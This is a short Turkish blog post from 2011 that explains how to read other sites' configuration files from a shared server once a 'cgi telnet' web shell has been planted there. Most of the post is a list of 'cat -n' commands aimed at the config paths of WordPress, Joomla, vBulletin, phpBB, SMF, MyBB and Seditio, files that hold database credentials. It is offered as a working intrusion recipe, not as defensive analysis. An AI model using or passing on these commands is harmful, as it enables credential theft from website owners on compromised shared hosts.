30 Mart 2011 Çarşamba

cgi telnet ile serverdaki sitelerin config yollarını öğrenmek

Config yollari




kodumuz : cat – n /home/kullanıcıadi/public_html/yol



Smf= cat -n /home/kullanıcıadi/public_html/Settings.php



Vbulettin= cat -n /home/kullanıcıadi/public_html/includes/config.php



Joomla=cat -n /home/name/public_html/configuration.php , configuration.php-dist



Phpbb= cat -n /home/kullanıcıadi/public_html/config.php



WordPress= cat -n /home/kullanıcıadi/public_html/wp-config.php



Seditio= cat -n /home/kullanıcıadi/public_html/datas/config.php



Mybb= cat -n /home/kullanıcıadi/public_html/inc/config.php



Bu yöntemle cgi telnet attıgımız serverdaki sitelerin config bilgilerini direk okuyabiliriz.

Hiç yorum yok:

Yorum Gönder